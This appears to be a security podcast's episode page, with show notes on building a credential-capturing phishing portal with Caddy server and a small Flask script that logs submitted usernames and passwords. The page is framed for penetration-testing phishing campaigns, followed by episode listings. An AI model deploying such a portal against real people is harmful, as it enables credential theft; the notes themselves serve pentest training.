7MS #583: Cred-Capturing Phishing with Caddy Server
7 Minute Security4 Elo 2023

7MS #583: Cred-Capturing Phishing with Caddy Server

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:














User Name:

Password:



Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:

Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Jaksot(711)

7MS #671: Pentesting GOAD

7MS #671: Pentesting GOAD

Hello! This week Joe "The Machine" Skeen and I kicked off a series all about pentesting GOAD (Game of Active Directory). In part one we covered: Checking for null session enumeration on domain contr...

18 Huhti 202525min

7MS #670: Adventures in Self-Hosting Security Services

7MS #670: Adventures in Self-Hosting Security Services

Hi friends, today I'm kicking off a series talking about the good/bad/ugly of hosting security services. Today I talk specifically about transfer.zip. By self-hosting your own instance of transfer.zip...

11 Huhti 202536min

7MS #669: What I'm Working on This Week – Part 3

7MS #669: What I'm Working on This Week – Part 3

Hi friends, in this edition of what I'm working on this week: 3 pulse-pounding pentests that had…problems Something I'm calling the unshadow/reshadow credentials attack Heads-up on a new video experi...

4 Huhti 202542min

7MS #668: Tales of Pentest Pwnage – Part 69

7MS #668: Tales of Pentest Pwnage – Part 69

Hola friends! Today's tale of pentest pwnage talks about abusing Exchange and the Azure ADSync account! Links to the discussed things: adconnectdump – for all your ADSync account dumping needs! Adam ...

28 Maalis 202530min

7MS #667: Pentesting GOAD SCCM - Part 2!

7MS #667: Pentesting GOAD SCCM - Part 2!

Hey friends, our good buddy Joe "The Machine" Skeen and I are back this week with part 2 (check out part 1!) tackling GOAD SCCM again! Spoiler alert: this time we get DA! YAY! Definitely check out t...

21 Maalis 202528min

7MS #666: Tales of Pentest Pwnage – Part 68

7MS #666: Tales of Pentest Pwnage – Part 68

Today we have a smattering of miscellaneous pentest tips to help you pwn all the stuff! Selective Snaffling with Snaffler The importance of having plenty of dropbox disk space – for redundant remote ...

14 Maalis 202545min

7MS #665: What I'm Working on This Week - Part 2

7MS #665: What I'm Working on This Week - Part 2

Hello there friends, I'm doing another "what I'm working on this week" episode which includes: BPATTY v1.6 release – big/cool/new content to share here PWPUSH – this looks to be an awesome way (both ...

7 Maalis 202528min

7MS #664: What I'm Working on This Week

7MS #664: What I'm Working on This Week

In today's episode I talk about what I'm working on this week, including: Playing with Sliver C2 and pairing it with ShellcodePack Talking about Netexecer, my upcoming tool that helps automate some o...

28 Helmi 202525min

Suosittua kategoriassa Politiikka ja uutiset

aikalisa
ootsa-kuullut-tasta-2
politiikan-puskaradio
tervo-halme
rss-ootsa-kuullut-tasta
viisupodi
rss-vaalirankkurit-podcast
rss-podme-livebox
rss-asiastudio
otetaan-yhdet
the-ulkopolitist
et-sa-noin-voi-sanoo-esittaa
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-kaikki-uusiksi
rss-hyvaa-huomenta-bryssel
rss-kiina-ilmiot
linda-maria
rikosmyytit
radio-antro
rss-polikulaari-pitka-kiekko-ja-muut-ts-podcastit